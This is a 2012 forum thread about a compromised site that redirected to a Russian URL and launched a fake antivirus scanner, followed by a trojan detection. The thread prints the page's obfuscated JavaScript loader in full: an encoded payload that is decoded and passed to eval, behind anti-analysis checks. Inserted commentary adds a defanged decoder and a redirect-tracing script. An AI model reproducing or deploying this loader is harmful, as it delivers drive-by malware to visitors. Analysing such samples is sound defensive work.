Malware ??? UNITEDINSIGHT.COM



zz000ter
Jul 7th, 2012, 10:06 AM
While doing some research I stumbled upon something I have never seen before.

I have tried to research it but I can't find anything about it.

I went to page UNITEDINSIGHT.COM
It automatically redirected to http://www.unitedinsight.com/htttp://reltime2012.ru/frunleh?9

The page was a blank page, and about 20 seconds later an app popped up. It said that some sort of system protection app was installed, and it started "scanning" my system for malware. As soon as I saw this I closed the app.

Kaspersky app did nothing against this thing

After shutting down the app I went back to try to investigate a bit further, but now I get an error:

This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/htttp://reltime2012.ru/frunleh?9 has resulted in too many redirects.

So I can't see the malware (or whatever it was) anymore

Has anyone else run into this?

Website looked legit on Google

WHOIS data

Administrative Contact:
-
David Champion (dchampion13@gmail.com)
+1.6464004671
Fax:
2 Gold St
3401
New York, NY 10038
US

zz000ter
Jul 7th, 2012, 10:08 AM
Here is what was in the page

<html><body><script>ZhwDQsg=7;RPvYZn="e";if(document.body.getAttribute("VxBUYR")!=null){ZhwDQsg+=800;RPvYZn="mUxwTV";}if(document.styleSheets.length!=0){ZhwDQsg+=800; RPvYZn="mUxwTV";}UblFPM="v";CUwJZE="g";TzunEPeg="u";NxSvKn="t";gfuANrM="l";CeNIhRi="r";UBgYNkMh="C";MfuVxE="a";PYiZTSgO="b";UXTRShIY="i";ukjhWK="o";UTGQlS="m";KVmdISaf="h";NFTvpm="f";aHGzWJEf="s";pTiPBKU="n";IrPWQkdZ="d";NuxeSU="c";OWgQKuVh="A";mYlCNr="x";QBTXmSwx="O";function vywOrPf(gEbTtceF,KcMhPAW){return gEbTtceF[KcMhPAW];}SmdqRgIn=vywOrPf(window,RPvYZn+UblFPM+MfuVxE+gfu ANrM);WKeDXc=function(rmlRDuwX,aqSwhGF){return rmlRDuwX[aHGzWJEf+TzunEPeg+PYiZTSgO+aHGzWJEf+NxSvKn+CeNIhRi +UXTRShIY+pTiPBKU+CUwJZE](aqSwhGF);};aPnqed=vywOrPf(String,NFTvpm+CeNIhRi+u kjhWK+UTGQlS+UBgYNkMh+KVmdISaf+MfuVxE+CeNIhRi+UBgY NkMh+ukjhWK+IrPWQkdZ+RPvYZn);function jSEZwkm(Tzybet){RYSmdxM="TQdeU5D2O+=HSyzY1g6V9kGRZxuCihWrqLAF8fb3v/IcXmjwEn4lJts7PoMBK0Nap";SBumqtKs=NuxeSU+KVmdISaf+MfuVxE+CeNIhRi+OWgQKuVh+ NxSvKn;UzOlCGv=UXTRShIY+pTiPBKU+IrPWQkdZ+RPvYZn+mY lCNr+QBTXmSwx+NFTvpm;XZvkRC=0;IrwHOhf="tufdJFj";do{SQyCxZRp=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));xmoDHhOg=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));FjqnvWzB=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));xyHnZkO=RYSmdxM[UzOlCGv](Tzybet[SBumqtKs](XZvkRC++));yTCoWA=SQyCxZRp<<18|xmoDHhOg<<12|FjqnvWzB<<6|xyHnZkO;dMSFGWil=yTCoWA>>16&255;FHPqdEJW=yTCoWA>>8&255;fOQWovSe=yTCoWA&255;if(FjqnvWzB==64){IrwHOhf+=aPnqed (dMSFGWil);}else if(xyHnZkO==64){IrwHOhf+=aPnqed(dMSFGWil,FHPqdEJW) ;}else{IrwHOhf+=aPnqed(dMSFGWil,FHPqdEJW,fOQWovSe) ;}}while(XZvkRC<Tzybet.length);return WKeDXc(IrwHOhf,ZhwDQsg);}SmdqRgIn(jSEZwkm("d3g4WRX=ub5sZk0EC2k3uGoruGo8xRqqY6TEz4Q4xRytC21nOe JqSeXqibklhGnJSAT0OeTBdbxwiATvu6T0OeTBOD8qYdQjZRx/xs5JC7OjiDntxsfji4oXxGo3hDqBOD8c=48=WEvqOdTqiAT0Od 0zxRLJOUhfCbk4ZRg/CsPq6b5sZ6Q1C2k3HGfjOdLixdX/RdPvRD1c=kEjRD1cODxwiAQyC7//CDnLOD+4C7hlxR+lHlX=OdTqO2+fi7kXheUqY6Q4HbkPxGSvCb 
5suGhLhD04H3QXhGh/C3yCukJjxDklZ7+/i2g/CsP/zEvqOdTquGZq=2+fi7kXheU/dATqOdQBdATqOdTqOdTqZ3+fZGXBdATqOdQ0dATqOdQ4OeJqHJ/LhbUq9Dntx4t/CATvRDgiHfn8Rdoixdqazf0ix2XnHe+0=VK/HlX=OdTqO2+fi7kXheOqY6Q4HbkPxGSvCb5suGhLhD04H3QXhG h/C3yCukJj"+"xDklZ7+/i2g/CsP/zEvqOdTquGZq=2+fi7kXheO/dATqOdQBdATqOdTqOdTqZ3+fZGXBdATqOdQ0d3J=uGZq=2+fi7 kXheU/d3X=OdTqODfbOdL4xRytC21nGl5hOeJ0OeUE=1vqOdTqWEvqOd TqOdTqOD/Lhb5rhbk4isfwCAT0OdOnHFijSdPAOdXqibklhGnJSkX4RVX=O dTqO2J=OdTqODkXis9=OdTqO2X=OdTqOdTqOdQIZRxLR7xfi3y/CsPqY6TAyeOAzEvqOdTqr1/0dbkXis9quGZq=2+fi7kXheO/d3X=OdTqOD/Lhb5rhbk4isfwCAT0O2+fi7kXhe+CSkJBd3J=xGnlx1/BdATqOdQIZRxLR7xfi3y/CsPqY6TACAOBd3J=rGyLhDyv=D9/Ws/Lhb5rhbk4isfwCFJAhG9Az7J=d3g4WRX=uGZq=DoLhbf3ZRgwi AoEC2k3uGolG4hQxD0Ax6QQZ7+wZb5J+tJ/d3X=OdTqO2OqY6Tw1GgwZb9q1Gy4Cs+LhdQ1C2k3H9fjO5xfi3 y/CsPq=5n8Rdoix2XnHe+0=eKMRdoix2XnHe+0=VK/ODxwiAQzxRglZs5Ex6KBdATqOdQ4SAT0Od0QxD0Ax6Q1gUZq9D ntx4t+CAQDC7Oqgbf4xGxwWdQLCb1qVbkJisyLiD9qOFKvRDgB S6E4rkEjRDgBS6E4rkEjRDgBS6E4r68AY4KBdATqOdQ/xATvCb5suGhLhD04H3QXhGh/C3yC+J58Cs+fOU5Fib0AZR13R6osxR+luG0j=1vqOdTqWEvqOd TqOdTqOD58Cs+fR7Q8xf0sxR+luG0jOeJqCb5suGhLhD04H3QX hGh/C3yC+J58Cs+fOU5Fib0AZR13R6osxR+luG0jzEvqOdTqr1vqOd TqxGnlx6Q/xATvibklhGnJOeJqiAofWDkF=DoLhbf3ZRgwiAoEC2k3uGolG4 hQxD0Ax6QQZ7+wZb5J+tJjxDklZ7+/i2g/CsP/=1vqOdTqWEvqOdTqOdTqOD58Cs+fR7Q8xf0sxR+luG0jOeJqib klhGnJGl5hzEvqOdTqr1vqOdTqxGnlx6Q/xATvibklhGnJOeJqiFOjxRLfZ4LjZRx/xs5JC7OjiDntxsfjitX31GgwZb9q1Gy4Cs+LhdhhHbgfisy4uR QJuG0j=68=OdTqO2X=OdTqOdTqOdQLxD0Axk0ExDxrhbk4isfw CAT0O2+fi7kXh5XnRVX=OdTqO2J=OdTqODkXis9=OdTqO2X=Od TqOdTqOdQLxD0Axk0ExDxrhbk4isfwCAT0Od+tOFX=OdTqO2J= r1/fC2yfd3X=OdTqOD58Cs+fR7Q8xf0sxR+luG0jOeJqObPAzE/0d3tFZRgFudLf=RmLxD0Axk0ExDxrhbk4isfwCFJAhG9Az7J=d 3g4WRX=ZGnEuD5AxR1qY6TASVtIgeg1i5y9S2vPk8+vGbmYzR5 mH8kx68L+S8JsxfL7W50e1kkAZJxgy7x6hG5wxGoHibh2VAx8y khlWGn/S4tShdOBdbtfi7yLxs9qY6TAieJA=s58Cs+fR7Q8xf0sxR+luG 0j=4ObuFJA=s/Lhb5rhbk4isfwCFX=CGklis53x6T0ODtfi7yLxs9jibkECD5Fx 
6qwH603HdTAR4O/zE/mxRylZGhfOeJqCGklis53x6o4xRQXZGyf=d0iHA03HdTAR4O/zE/JCRTqY6TAOFX=xb04OdL/YVTBOD8KCGklis53x6oXxGo3hDqBOD8c=48=WEvqOdTqRsyvZR OqY6QmxRylZGhfHbyvZR+QhdL/=VX=OdTqODfjxDkPOeJq=D5XiDLLZbkJHbfjxDkPVsZvRsyvZR O/OdXqS68q+6QLC2QvZG+fhdoXxGo3hDqBdATqOdQJCRTq=lJqZG nEuD5AxR1jZsLLi85J=DfjxDkP=VX=r1/mxRylZGhfOeJqhDtEH3+fiDnLZs9vH4Zwx4EqO8EA=6o4xRQXZ Gyf=dK0HsiXOd+5OA8Bdq/JCRTqY6TAOFXqhDtESAT0OdOAz4QJCRTlOeJqOAOBdbxwiATvu VJEz4Q/YDtfi7yLxs9jCDkjx7gvz4Q/=lJt=1/BdATqOdQJCRTq=lJqCGklis53x6olhG+lh2Ovu6Eqy68ji7QXu R1vOAO/H3+fhbk4is9v=6oICsfj=dOA=VX=r1/bC7Oq=D80SeXquVnJCRTjCDkjx7gvz4Q/=lJl=1/BdATqOdQJCRT4OdX0O2gmidolhG+lh2Ovu6EqS48ji7QXuR1vO AO/H3+fhbk4is9v=6oICsfj=dOA=VX=r1/bC7Oq=D80SeXquVnJCRT4HbnfCbhJueXqu6X0SVS/d3X=OdTqO2gmieSq=lJqhDtESAolhG+lh2Ovu6EqSVS/H3yECDfJ=dOA=6o4xRxfi3yf=d8jub0/CAqAOA8Bd3J=CGklis53x6T0O2gmieSBdq/8CsytCGkjhdo7ibfJx6qAY2yFibfEhdQlibS0+40SCFhLV7QOH 4tHxR1P1FkI6fUaWFJA=stfi7yLxs9cOAiNYd0lZ7+/i21A=4ONOA8Bd3tFZRgFudLf=Rm8CsytCGkjhdo7ibfJx6qAY2 yFibfEhdQlibS0+40Li3g/ZsnfHbLJCGEaOAmfHboLCG9cOf0rOAmfHbtfi7yLxs9cOAiNYd 0lZ7+/i21A=4ONOA8Br1vp"));</script></body></html>
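A few things can be read off the posted script without running it: it assembles property names one letter at a time ("e"+"v"+"a"+"l", "fromCharCode", "charAt", "indexOf", "substring"), decodes the long string with a base64 variant over a shuffled alphabet, seeds the output with a 7-character junk prefix that substring(7) later removes, and passes the result to window["eval"]. It also makes two DOM checks first (a nonsense attribute on document.body, and whether document.styleSheets is non-empty); if either is true it adds 800 to the substring offset and breaks the "eval" name, so the payload only surfaces when the page looks like a plain browser. The block below is an added example, not code from the thread: a stand-alone re-implementation of that decoding stage for Node, with the eval sink replaced by a function that only returns the text. The alphabet and junk prefix are copied from the posted script; every other name, the encoder, and the sample payload are my own, and the real blob is not decoded here.

```javascript
// Added example, not the script from the thread. Re-implements its decoding
// stage so the text that would reach eval can be inspected instead of run.
const ALPHABET = "TQdeU5D2O+=HSyzY1g6V9kGRZxuCihWrqLAF8fb3v/IcXmjwEn4lJts7PoMBK0Nap";
const PAD = 64;                // the 65th character, 'p', acts as padding
const JUNK_PREFIX = "tufdJFj"; // accumulator seed that substring(7) strips

// Same arithmetic as the posted jSEZwkm(): 4 symbols -> 24 bits -> 1..3 bytes.
// The original never checks length or membership; both checks are added here.
function customB64Decode(blob, alphabet = ALPHABET) {
  if (blob.length % 4 !== 0) throw new Error("blob length is not a multiple of 4");
  let out = "";
  for (let i = 0; i < blob.length; i += 4) {
    const q = [0, 1, 2, 3].map((k) => alphabet.indexOf(blob.charAt(i + k)));
    if (q.some((v) => v < 0)) throw new Error("symbol outside the alphabet near offset " + i);
    const [a, b, c, d] = q;
    const n = (a << 18) | (b << 12) | (c << 6) | d;
    const b1 = (n >> 16) & 255, b2 = (n >> 8) & 255, b3 = n & 255;
    if (c === PAD) out += String.fromCharCode(b1);
    else if (d === PAD) out += String.fromCharCode(b1, b2);
    else out += String.fromCharCode(b1, b2, b3);
  }
  return out;
}

// Encoder for building test input (the posted page has no encoder; this is
// mine). Input is treated as Latin-1, one byte per character.
function customB64Encode(text, alphabet = ALPHABET) {
  let out = "";
  for (let i = 0; i < text.length; i += 3) {
    const have = Math.min(3, text.length - i);
    let n = 0;
    for (let k = 0; k < 3; k++) {
      const code = k < have ? text.charCodeAt(i + k) : 0;
      if (code > 255) throw new Error("non-Latin-1 character at " + (i + k));
      n = (n << 8) | code;
    }
    out += alphabet[(n >> 18) & 63] + alphabet[(n >> 12) & 63];
    out += have > 1 ? alphabet[(n >> 6) & 63] : alphabet[PAD];
    out += have > 2 ? alphabet[n & 63] : alphabet[PAD];
  }
  return out;
}

// Mirrors the two DOM checks at the top of the posted script. On a blank page
// in a normal browser both are false. If either is true the offset grows by 800
// (discarding the start of the decoded text) and "eval" becomes "mUxwTVval",
// which is not a function on window.
function chooseSink(env) {
  let offset = 7;
  let sinkName = "e";
  if (env.bodyHasMarkerAttribute) { offset += 800; sinkName = "mUxwTV"; }
  if (env.styleSheetCount !== 0) { offset += 800; sinkName = "mUxwTV"; }
  return { offset, sinkName: sinkName + "val" };
}

// The decode stage with the sink defanged: returns what would have been eval'd
// and the name the script would have looked up, instead of calling it.
function decodeStage(blob, env = { bodyHasMarkerAttribute: false, styleSheetCount: 0 }) {
  const { offset, sinkName } = chooseSink(env);
  const text = (JUNK_PREFIX + customB64Decode(blob)).substring(offset);
  return { sinkName, text };
}

// Constructed sample payload; stands in for the real blob, which is not decoded here.
const SAMPLE_PAYLOAD = 'document.title = "constructed sample, not the real payload";';
const SAMPLE_BLOB = customB64Encode(SAMPLE_PAYLOAD);

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodeStage(SAMPLE_BLOB));
  console.log(decodeStage(SAMPLE_BLOB, { bodyHasMarkerAttribute: false, styleSheetCount: 1 }));
}
```

To apply this to a blob you actually captured, copy it out of the page source with the line-wrap spaces removed and feed it to decodeStage; whatever comes back is a string to read, not to run, and the next stage usually needs the same treatment.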

xalex0
Jul 7th, 2012, 10:26 AM
clear your cookies.

zz000ter
Jul 7th, 2012, 10:28 AM
Yes - I cleared all browsing history and cookies immediately

The odd thing was (I am on Win7) it did not ask me to download or install anything.
This thing just started doing its thing on its own

This is kind of worrisome

xalex0
Jul 7th, 2012, 10:38 AM
This thing just started doing its thing on its own
That's just javascript animation. It didn't necessarily do anything. Usually they tell you afterwards that their scan has found some problems and now you need to download a "fix". That's why you should use NoScript or the like.

zz000ter
Jul 7th, 2012, 10:41 AM
That's just javascript animation.

Thanks! I feel better now.

Do you have any thoughts on the error I get when I try to access the site again?


This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/ has resulted in too many redirects.

xalex0
Jul 7th, 2012, 10:46 AM
Thanks! I feel better now.

Do you have any thoughts on the error I get when I try to access the site again?


This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/ has resulted in too many redirects.
Maybe they have shut it down for maintenance?

Kwirky
Jul 7th, 2012, 12:38 PM
Thanks! I feel better now.

Do you have any thoughts on the error I get when I try to access the site again?


This webpage has a redirect loop
The webpage at http://www.unitedinsight.com/ has resulted in too many redirects.

A redirect loop happens when a site redirects you somewhere that redirects you back (hence the loop). This is something that's happening with the site itself: it is likely, given the malware-type things you were seeing before, that the site has been compromised, and this is now the end result until the site's webmaster gets it fixed.
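As an added example, not part of Kwirky's post: the chain can be followed with nothing but status codes and Location headers, which tells a genuine loop apart from a long chain and, unlike loading the page in a browser, renders no body and runs no script. The response table is constructed for illustration; the hostnames are placeholders, and the responses are not observations of the site discussed in this thread.

```javascript
// Added example, not from the thread. Follows a redirect chain from a table of
// responses and reports "final", "loop" or "too-many-redirects".
const MAX_HOPS = 10; // browsers give up after a fixed count (around 20) with the error seen above

// Constructed responses keyed by URL. `location` is kept as a server would send
// it, so relative values are resolved against the current URL below.
const RESPONSES = {
  "http://site.example/":        { status: 302, location: "/landing" },
  "http://site.example/landing": { status: 302, location: "http://other.example/x?1" },
  "http://other.example/x?1":    { status: 302, location: "http://site.example/" },
  "http://clean.example/":       { status: 301, location: "https://clean.example/" },
  "https://clean.example/":      { status: 200 },
};

// lookup(url) returns { status, location? } or undefined; replace it with a HEAD
// request (without following redirects) to run this against a live host.
function followRedirects(startUrl, lookup, maxHops = MAX_HOPS) {
  const chain = [startUrl];
  const seen = new Set([startUrl]);
  let current = startUrl;
  for (let hop = 0; hop < maxHops; hop++) {
    const resp = lookup(current);
    if (!resp) return { outcome: "no-response", chain };
    if (resp.status < 300 || resp.status > 399 || !resp.location) {
      return { outcome: "final", status: resp.status, chain };
    }
    const next = new URL(resp.location, current).href; // resolves relative Location
    chain.push(next);
    if (seen.has(next)) return { outcome: "loop", chain }; // revisited a URL: a real loop
    seen.add(next);
    current = next;
  }
  return { outcome: "too-many-redirects", chain }; // long, but not proven circular
}

const tableLookup = (url) => RESPONSES[url];

if (typeof require !== "undefined" && require.main === module) {
  console.log(followRedirects("http://site.example/", tableLookup));
  console.log(followRedirects("http://clean.example/", tableLookup));
}
```

The distinction matters when reading the browser's message: "too many redirects" is what the browser reports for both cases, while the visited set above shows whether the chain actually returned to a URL it had already been to.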

zz000ter
Jul 7th, 2012, 01:10 PM
Something more suspicious

I ran Kaspersky again after an update and it found this file:

c:\Users\Name\AppData\Local\zskknls.exe

Says it is a Trojan: Trojan-FakeAV.Win32.Agent.dxo
with timestamp 9:38 AM, at the time I hit the website

Suspicious???

xalex0
Jul 7th, 2012, 01:25 PM
It must be a new one, if KAV wasn't finding it before. Has it been executed, though?

zz000ter
Jul 7th, 2012, 02:45 PM
I don't know if the exe was executed.
I am now rescanning the system - takes hours - ugggghhhh

0xffff
Jul 10th, 2012, 11:11 AM
I don't know if the exe was executed.
I am now rescanning the system - takes hours - ugggghhhh

I hope you're using a non-windows AV boot disc to scan, other methods are pretty unreliable in comparison.